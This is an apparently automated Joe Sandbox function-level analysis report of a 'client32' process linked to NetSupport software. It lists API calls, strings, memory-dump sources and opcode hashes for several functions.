API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92

Function 111042A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
std::exception::exception.LIBCMT ref: 11104424
__CxxThrowException@8.LIBCMT ref: 11104439

Strings

Wtsapi32.dll, xrefs: 1110436E
Advapi32.dll, xrefs: 11104375

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
String ID: Advapi32.dll$Wtsapi32.dll
API String ID: 1187064156-2390547818
Opcode ID: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
Opcode Fuzzy Hash: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51

Function 11135BC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11135BEA
GetTickCount.KERNEL32 ref: 11135BF1

Strings

AutoICFConfig, xrefs: 11135C10
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC
Client, xrefs: 11135C15
DoICFConfig() OK, xrefs: 11135C96

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56

Function 68599C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,?,00000000), ref: 68599C93
timeGetTime.WINMM(?,?,?,00000000), ref: 68599CD0
Sleep.KERNEL32(00000000), ref: 68599CDE
LeaveCriticalSection.KERNEL32(?), ref: 68599D4F
InterlockedIncrement.KERNEL32(?), ref: 68599D72

Strings

3', xrefs: 68599CB2

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
String ID: 3'
API String ID: 77915721-280543908
Opcode ID: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
Instruction ID: 236607c0a8a5709804ead984073072827bcf7aa643f65f3bb03ea8ca8f484ff1
Opcode Fuzzy Hash: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
Instruction Fuzzy Hash: 63216D75A042288FDF20DF64CC88B9AB7B8AF45314F4542D5E91D9B281CA30ED84CF91

Function 110259E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
SetLastError.KERNEL32(00000078), ref: 11025A49

Strings

GetProcessImageFileNameA, xrefs: 110259F0
GetModuleFileNameExA, xrefs: 11025A20

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4

Function 1110C2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321

Strings

hThread, xrefs: 1110C300
..\ctl32\Refcount.cpp, xrefs: 1110C2FB

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0

Function 110313B0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110313F7

Strings

609290, xrefs: 110313DE
_SW, xrefs: 110313CC
_HW, xrefs: 110313C0
%s%s%s.bin, xrefs: 110313F1
_HF, xrefs: 110313D8, 110313DD

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$609290$_HF$_HW$_SW
API String ID: 2111968516-2317863409
Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5

Function 110FFCC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
GetStockObject.GDI32(00000004), ref: 110FFD6B
RegisterClassA.USER32(?), ref: 110FFD7F
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC

Strings

NSMDesktopWnd, xrefs: 110FFCF9, 110FFD78, 110FFDB6

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95

Function 11139340 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
KillTimer.USER32(00000000,00007F1D,TermUI...), ref: 111393C3
FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113943B
FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453

Strings

TermUI, xrefs: 11139342

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeKillLibraryTimer
String ID: TermUI
API String ID: 2006562601-4085834059
Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92

Function 111419A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
RegCloseKey.ADVAPI32(?), ref: 11141A74

Strings

SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 111419F0
ForceRTL, xrefs: 11141A33
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 111419D7, 11141A0E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71

Function 1110E460 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439

GetComputerNameA.KERNEL32(?,?), ref: 1110E508

Strings

, xrefs: 1110E501
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 1110E517
ACM, xrefs: 1110E4C2
\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 1110E4B0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751

Function 11017520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000002EC,000000FF), ref: 1101755C
CoInitialize.OLE32(00000000), ref: 11017565
CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0

Strings

Win32_ComputerSystem, xrefs: 1101757D
PCSystemTypeEx, xrefs: 1101759C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
